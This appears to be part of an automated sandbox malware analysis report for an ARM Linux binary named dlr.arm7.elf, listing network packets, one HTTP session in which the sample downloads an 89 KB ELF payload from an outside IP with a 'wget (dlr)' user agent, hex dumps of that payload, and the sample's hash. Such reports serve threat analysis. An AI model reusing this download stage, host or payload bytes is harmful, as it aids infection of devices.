                                              Jan 8, 2025 18:27:51.178194046 CET8033756103.136.41.100192.168.2.23
                                              Jan 8, 2025 18:27:51.178461075 CET8033756103.136.41.100192.168.2.23
                                              Jan 8, 2025 18:27:51.179368019 CET3375680192.168.2.23103.136.41.100
                                              Jan 8, 2025 18:27:51.190026045 CET3375680192.168.2.23103.136.41.100
                                              Jan 8, 2025 18:27:51.194822073 CET8033756103.136.41.100192.168.2.23
                                              Jan 8, 2025 18:27:52.145953894 CET43928443192.168.2.2391.189.91.42
                                              Jan 8, 2025 18:27:57.521217108 CET42836443192.168.2.2391.189.91.43
                                              Jan 8, 2025 18:27:59.056941986 CET4251680192.168.2.23109.202.202.202
                                              Jan 8, 2025 18:28:13.134888887 CET43928443192.168.2.2391.189.91.42
                                              Jan 8, 2025 18:28:23.373565912 CET42836443192.168.2.2391.189.91.43
                                              Jan 8, 2025 18:28:29.516721010 CET4251680192.168.2.23109.202.202.202
                                              Jan 8, 2025 18:28:54.089293957 CET43928443192.168.2.2391.189.91.42
                                              Jan 8, 2025 18:29:14.566394091 CET42836443192.168.2.2391.189.91.43
                                              • 127.0.0.1
                                              Session IDSource IPSource PortDestination IPDestination Port
                                              0192.168.2.2333756103.136.41.10080
                                              TimestampBytes transferredDirectionData
                                              Jan 8, 2025 18:27:50.303209066 CET91OUTGET /6 HTTP/1.1
                                              Host: 127.0.0.1
                                              Connection: close
                                              User-Agent: wget (dlr)
                                              Jan 8, 2025 18:27:50.900973082 CET730INHTTP/1.1 200 OK
                                              Accept-Ranges: bytes
                                              Content-Length: 89080
                                              Content-Type: application/octet-stream
                                              Last-Modified: Wed, 08 Jan 2025 16:59:29 GMT
                                              Date: Wed, 08 Jan 2025 17:27:50 GMT
                                              Connection: close
                                              Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 94 81 00 00 34 00 00 00 78 59 01 00 02 00 00 04 34 00 20 00 05 00 28 00 10 00 0f 00 01 00 00 70 18 53 01 00 18 d3 01 00 18 d3 01 00 18 01 00 00 18 01 00 00 04 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 30 54 01 00 30 54 01 00 05 00 00 00 00 80 00 00 01 00 00 00 30 54 01 00 30 54 02 00 30 54 02 00 ac 04 00 00 84 38 00 00 06 00 00 00 00 80 00 00 07 00 00 00 34 54 01 00 34 54 02 00 34 54 02 00 00 00 00 00 08 00 00 00 04 00 00 00 04 00 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 0d c0 a0 e1 f0 df 2d e9 04 b0 4c e2 f0 af 1b e9 00 00 00 00 00 00 00 00 00 00 00 00 10 40 2d e9 2c 40 9f e5 00 30 d4 e5 00 00 53 e3 06 00 00 1a 20 30 9f e5 00 00 53 e3 1c 00 9f 15 0f e0 a0 11 13 ff 2f 11 01 30 a0 e3 00 30 c4 e5 10 40 bd e8 1e ff 2f e1 dc 58 02 00 00 00 00 00 30 54 02 00 04 e0 2d e5 40 30 9f e5 00 00 53 e3 04 d0 4d e2 38 00 9f 15 38 10 9f 15 0f e0 a0 11 13 ff [TRUNCATED]
                                              Data Ascii: ELF(4xY4 (pS0T0T0T0T0T84T4T4TQtd-L@-,@0S 0S/00@/X0T-@0SM88/00S$0S//0TX<T ---0;w4@-B0SD w)0SG
                                              Jan 8, 2025 18:27:50.901173115 CET1236INData Raw: 10 00 84 e2 00 10 a0 e3 10 20 a0 e3 70 29 00 eb 20 30 94 e5 00 00 53 e3 4a 00 00 1a 20 00 84 e2 00 10 a0 e3 10 20 a0 e3 69 29 00 eb 30 30 94 e5 00 00 53 e3 4d 00 00 1a 30 00 84 e2 00 10 a0 e3 10 20 a0 e3 62 29 00 eb 40 30 94 e5 00 00 53 e3 50 00
                                              Data Ascii: p) 0SJ i)00SM0 b)@0SP@ [)P0SSP T)`0SV` M)p0SYp F)0S\ ?)0S_ 8)@
                                              Jan 8, 2025 18:27:50.901185036 CET248INData Raw: 08 00 00 0a 00 00 50 e3 08 00 00 1a 09 00 a0 e1 11 39 00 eb 32 2a 00 eb 09 10 a0 e3 35 2a 00 eb 04 00 a0 e1 84 35 00 eb 06 00 a0 e1 82 35 00 eb 70 30 9f e5 00 10 d3 e5 00 00 51 e3 0e 00 00 0a 64 30 9f e5 00 20 93 e5 00 c0 92 e5 04 30 dc e5 07 00
                                              Data Ascii: P92*5*55p0Qd0 0S0SPm5 $0/ XXO-Q$M$O/!<, 44
                                              Jan 8, 2025 18:27:50.901210070 CET1236INData Raw: 01 1c 83 e1 04 00 5c e3 14 10 8d e5 f2 ff ff 0a 04 30 de e5 05 00 5c e3 10 30 8d e5 ee ff ff 0a 05 80 de e5 00 00 58 e3 eb ff ff 0a 08 31 a0 e1 06 20 4c e2 08 30 83 e0 03 00 52 e1 e6 ff ff 3a 08 00 a0 e1 18 10 a0 e3 06 70 8e e2 02 60 a0 e1 6e 30
                                              Data Ascii: \0\0X1 L0R:p`n0P@00 0P0U0 0p`F@ '0 0V:PU@F`,H0T`
                                              Jan 8, 2025 18:27:50.901222944 CET248INData Raw: 98 21 9f e5 00 50 a0 e1 0a 30 a0 e3 08 10 81 e0 00 00 96 e5 00 20 85 e5 04 30 c5 e5 01 11 a0 e1 98 2f 00 eb 00 30 d4 e5 00 20 a0 e1 03 51 80 e7 08 10 a0 e3 08 30 83 e0 08 00 a0 e1 00 30 c4 e5 00 20 86 e5 3f 2f 00 eb 00 10 d4 e5 50 21 9f e5 00 50
                                              Data Ascii: !P0 0/0 Q00 ?/P!P0 0/0 Q00 ,/!P0 0r/0 Q0 0/0P
                                              Jan 8, 2025 18:27:50.901236057 CET1236INData Raw: 08 70 a0 e3 08 10 81 e0 00 00 96 e5 00 30 85 e5 04 70 c5 e5 01 11 a0 e1 5f 2f 00 eb 00 30 d4 e5 00 20 a0 e1 03 51 80 e7 07 10 a0 e1 08 30 83 e0 08 00 a0 e1 00 30 c4 e5 00 20 86 e5 06 2f 00 eb 00 10 d4 e5 78 20 9f e5 00 50 a0 e1 09 30 a0 e3 08 10
                                              Data Ascii: p0p_/0 Q00 /x P0 0L/0Q A/XXP(0 |0Tp8O-M@P.,
                                              Jan 8, 2025 18:27:50.901256084 CET1236INData Raw: 82 33 a0 e1 02 31 43 e0 02 30 83 e0 83 00 40 e0 01 00 80 e2 ba 00 cd e5 7c 18 00 eb 24 33 9f e5 93 e0 82 e0 a2 21 a0 e1 02 32 a0 e1 02 31 43 e0 03 30 62 e0 00 00 63 e0 c8 10 8d e2 00 01 a0 e1 01 00 80 e0 70 20 10 e5 02 28 a0 e1 22 34 a0 e1 ff 3c
                                              Data Ascii: 31C0@|$3!21C0bcp ("4<"<0 i$0@000 @Y@d^-,0 q00@00 H 0@ \0
                                              Jan 8, 2025 18:27:50.901272058 CET484INData Raw: 8f 00 00 0a 20 1c a0 e1 40 00 9d e5 02 3c a0 e1 ff 20 00 e2 23 38 a0 e1 02 24 81 e1 2c cc 83 e1 0c 20 8d e5 2c 20 8d e2 0c 00 92 e8 01 30 03 e2 01 20 02 e2 10 20 8d e5 14 30 8d e5 34 00 8d e2 0d 00 90 e8 01 00 00 e2 01 20 02 e2 01 30 03 e2 01 60
                                              Data Ascii: @< #8$, , 0 04 0`L 0$`@,TQ00@00 @ H 2 1C0 0 1
                                              Jan 8, 2025 18:27:50.901283026 CET1236INData Raw: 20 34 a0 e1 ff 3c 03 e2 20 3c 83 e1 0a 20 a0 e3 ba 32 c5 e1 04 00 a0 e3 08 30 a0 e3 2e 30 c5 e5 2f 20 c5 e5 2c 00 c5 e5 2d 60 c5 e5 cf 16 00 eb 06 30 a0 e3 3b 30 c5 e5 30 00 85 e5 03 20 a0 e3 01 30 a0 e3 00 00 a0 e3 34 00 85 e5 38 30 c5 e5 3a 20
                                              Data Ascii: 4< < 20.0/ ,-`0;00 0480: 9 T0@TT@0YT021C0 QR`6H rKH@0@DSMDPOWQ
                                              Jan 8, 2025 18:27:50.901294947 CET1236INData Raw: 80 32 83 e1 0d 30 c1 e5 0d 20 d1 e5 10 30 9d e5 10 20 c2 e3 03 22 82 e1 0d 20 c1 e5 0d 30 d1 e5 14 00 9d e5 08 30 c3 e3 80 31 83 e1 0d 30 c1 e5 0d 20 d1 e5 18 30 9d e5 04 20 c2 e3 03 21 82 e1 0d 20 c1 e5 0d 30 d1 e5 1c 00 9d e5 02 30 c3 e3 80 30
                                              Data Ascii: 20 0 " 0010 0 ! 0000 0 P 00 0 D 0 P(0)W 4< <2 0, -0 0.0/ q 0;`04P
                                              Jan 8, 2025 18:27:50.906132936 CET1236INData Raw: 04 01 83 e7 02 41 93 e7 00 30 d4 e5 b0 30 c3 e3 40 30 83 e3 00 30 c4 e5 00 20 d4 e5 0a 20 c2 e3 00 50 a0 e3 05 20 82 e3 00 20 c4 e5 01 50 c4 e5 b2 a0 c4 e1 69 14 00 eb 40 30 a0 e3 06 20 a0 e3 08 30 c4 e5 09 20 c4 e5 5c 10 9d e5 81 32 a0 e1 81 31
                                              Data Ascii: A00@00 P Pi@0 0 \21CT( 0 P`0 020 0 " 0010 0 ! 0 000 0$ 0


                                              System Behavior

                                              Start time (UTC):17:27:49
                                              Start date (UTC):08/01/2025
                                              Path:/tmp/dlr.arm7.elf
                                              Arguments:/tmp/dlr.arm7.elf
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1